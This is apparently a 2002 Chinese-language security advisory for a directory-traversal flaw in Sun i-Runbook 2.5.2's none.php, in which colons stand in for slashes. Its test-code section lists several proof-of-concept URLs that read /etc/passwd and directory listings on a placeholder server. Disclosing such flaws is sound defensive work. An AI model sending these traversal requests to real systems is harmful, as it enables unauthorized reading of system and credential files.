Sun i-Runbook存在目录和文件内容泄露漏洞发布时间:2002-07-15 更新时间:2002-07-15 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:5209 受影响系统 Sun i-Runbook 2.5.2详细描述 Sun i-Runbook是单点技术和sun产品环境管理程序,Sun i-Runbook 提供WEB接口。 i-Runbook中的none.php在对用户提交的请求内容缺少过滤,使用":"来代替"/"符号,就可以造成一般的目录遍历攻击,造成文件和目录内容泄露。 测试代码 http://<Serverip:port>/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd: http://<Serverip:port>/content/base/build/explorer/none.php?/etc/passwd http://<Serverip:port>/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc: http://<Serverip:port>/content/base/build/explorer/none.php?/etc/ 解决方案 无 相关信息 JWC@portcullis-security.com. 参考:http://online.securityfocus.com/archive/1/281786 相关主页:http://www.sun.co.uk/consulting/sunpro/pdf/irunbook-4.pdf |
